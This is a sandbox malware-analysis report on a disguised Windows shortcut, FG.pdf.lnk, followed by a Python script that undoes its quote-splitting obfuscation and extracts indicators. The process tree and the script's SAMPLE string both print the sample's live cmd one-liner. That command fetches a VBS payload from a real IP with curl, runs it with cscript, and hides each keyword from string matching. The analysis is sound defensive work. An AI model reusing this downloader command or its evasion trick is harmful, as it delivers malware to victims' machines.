Analysis

  • max time kernel
    263s
  • max time network
    318s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags
    arch:x64, arch:x86, image:win7-20230831-en, locale:en-us, os:windows7-x64, system
  • submitted
    11/10/2023, 14:08

General

  • Target

    FG.pdf.lnk

  • Size

    2KB

  • MD5

    7726e0d4ce453fc9542d1356e9c18e0e

  • SHA1

    13b8393a434d1f6dfe3224644dadd7be9bdf1a1e

  • SHA256

    9ad5bb0943d324d197caafe209dff379d5882caafe1628cf8779e5c58f8bb87b

  • SHA512

    4a001bf8cc31ebe8d8605d621bdecdcaf01ade51723a4698ba4ebfc1f92714b45116ed903e92f8624ec299bc92f8320d164853526e626a4ff0fffc4484f41858

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\FG.pdf.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2012
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c v49M || eCHo v49M & p"i"ng v49M || cu"R"l h"t"t"p":/"/"4"5."3"2"."222"."25"3/ym"t"p"R"/Yl -o C:\Users\Admin\AppData\Local\Temp\v49M.vbs & p"i"ng -n 3 v49M || c"scri"pT C:\Users\Admin\AppData\Local\Temp\v49M.vbs & e"x"It 'lHqqYhMrcXR
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2488
      • C:\Windows\system32\PING.EXE
        p"i"ng v49M
        3⤵
        • Runs ping.exe
        PID:2720
      • C:\Windows\system32\PING.EXE
        p"i"ng -n 3 v49M
        3⤵
        • Runs ping.exe
        PID:2872
      • C:\Windows\system32\cscript.exe
        c"scri"pT C:\Users\Admin\AppData\Local\Temp\v49M.vbs
        3⤵
          PID:2876
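
The depth-2 cmd.exe command line above is the whole payload. The .lnk target is cmd /c with a one-liner that breaks every keyword with inserted double quotes (p"i"ng, cu"R"l, c"scri"pT, a URL split into h"t"t"p":/"/"...) so that string-matching rules on the .lnk miss them, while cmd's command lookup and the child process's argv parser both drop the quotes; the tree confirms this, since PING.EXE is launched with the literal command line p"i"ng v49M. Each || pair has a left-hand side that is meant to fail (v49M is not a command, and ping against a junk name that does not resolve returns non-zero) so the right-hand side runs: echo, then curl to fetch a script from 45.32.222.253 into %TEMP%\v49M.vbs, then cscript on that file, then exit with trailing junk. Note what the tree does not contain: no curl.exe. The Windows 7 image has no built-in curl (it ships with Windows 10 1803 and later), so unless the image added it the download stage never ran, cscript was handed a path that did not exist, and the 3/10 score reflects a detonation that stopped at stage one rather than a benign file.

The following Python is added here as a worked example and is not part of the sandbox's tooling. It normalizes the quote-splitting the way cmd and the CRT argv parser do, splits the chain on &, && and || outside quotes, and pulls out the URL, the dropped-file path, the programs invoked and the commands that sit on the right of a ||. SAMPLE is copied verbatim from the process tree; the function names and IOC categories are this example's own.

```python
"""Normalize cmd.exe quote-splitting obfuscation and pull IOCs out of the
FG.pdf.lnk command line.  Added example for this report, not part of the
sandbox's own tooling; SAMPLE is copied from the process tree, every name
below is this example's own."""
import re

# Copied verbatim from the depth-2 cmd.exe in the process tree above.
SAMPLE = r'''"C:\Windows\System32\cmd.exe" /c v49M || eCHo v49M & p"i"ng v49M || cu"R"l h"t"t"p":/"/"4"5."3"2"."222"."25"3/ym"t"p"R"/Yl -o C:\Users\Admin\AppData\Local\Temp\v49M.vbs & p"i"ng -n 3 v49M || c"scri"pT C:\Users\Admin\AppData\Local\Temp\v49M.vbs & e"x"It 'lHqqYhMrcXR'''

OPERATORS = ("||", "&&", "&")   # two-character operators must be tried before "&"


def split_commands(cmdline):
    """Split on &, && and || that sit outside double quotes.
    Returns [(operator_before, raw_command), ...]; the first operator is ''."""
    parts, buf, op, in_quote, i = [], "", "", False, 0
    while i < len(cmdline):
        c = cmdline[i]
        if c == '"':
            in_quote = not in_quote
        if not in_quote and c == "^" and i + 1 < len(cmdline):
            buf += cmdline[i:i + 2]          # keep the ^x escape pair for words()
            i += 2
            continue
        if not in_quote:
            for o in OPERATORS:
                if cmdline.startswith(o, i):
                    parts.append((op, buf.strip()))
                    buf, op, i = "", o, i + len(o)
                    break
            else:
                buf += c
                i += 1
            continue
        buf += c
        i += 1
    parts.append((op, buf.strip()))
    return parts


def words(command):
    """Tokenize one command on whitespace outside quotes, dropping the quote
    characters and ^ escapes.  That is what cmd's command lookup and the child's
    argv parser see, so p"i"ng becomes ping and the split URL is reassembled.
    A quoted "a b" stays one token, so spaces inside quotes are preserved."""
    out, buf, in_quote, i = [], "", False, 0
    while i < len(command):
        c = command[i]
        if c == '"':
            in_quote = not in_quote          # quotes toggle state and vanish
        elif c == "^" and not in_quote and i + 1 < len(command):
            i += 1
            buf += command[i]                # ^x -> x
        elif c.isspace() and not in_quote:
            if buf:
                out.append(buf)
                buf = ""
        else:
            buf += c
        i += 1
    if buf:
        out.append(buf)
    return out


def deobfuscate(cmdline):
    """Return the normalized command chain and the IOCs it references."""
    chain, urls, paths, programs = [], [], [], []
    for op, raw in split_commands(cmdline):
        toks = words(raw)
        # Drop the leading "cmd.exe /c" wrapper so the first entry is the payload.
        if len(toks) > 2 and toks[0].lower().endswith("cmd.exe") and toks[1].lower() in ("/c", "/k"):
            toks = toks[2:]
        if not toks:
            continue
        chain.append((op, " ".join(toks)))
        programs.append(toks[0].lower())
        for t in toks:
            if re.match(r"(?i)https?://", t):
                urls.append(t)
            elif re.match(r"(?i)[a-z]:\\", t):
                paths.append(t)
    return {
        "chain": chain,
        "urls": list(dict.fromkeys(urls)),
        "paths": list(dict.fromkeys(paths)),
        "programs": sorted(set(programs)),
        # Left-hand sides of "||" are designed to fail (unknown command, name
        # that does not resolve); the right-hand sides are what actually runs.
        "fallbacks": [cmd for (o, cmd) in chain if o == "||"],
    }


if __name__ == "__main__":
    result = deobfuscate(SAMPLE)
    for op, cmd in result["chain"]:
        print(f"{op:>2} {cmd}")
    for key in ("urls", "paths", "programs", "fallbacks"):
        print(key, result[key])
```

Run against SAMPLE this yields the URL http://45.32.222.253/ymtpR/Yl, the drop path C:\Users\Admin\AppData\Local\Temp\v49M.vbs, and curl, cscript and ping among the invoked programs, which is what should be fed to network and host detections rather than the quote-riddled original. Stripping quotes is only safe because the tokenizer tracks quote state first: a naive global removal of every double quote would merge or split arguments whenever a quoted segment contains whitespace or a & character.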

Network

MITRE ATT&CK Enterprise v15
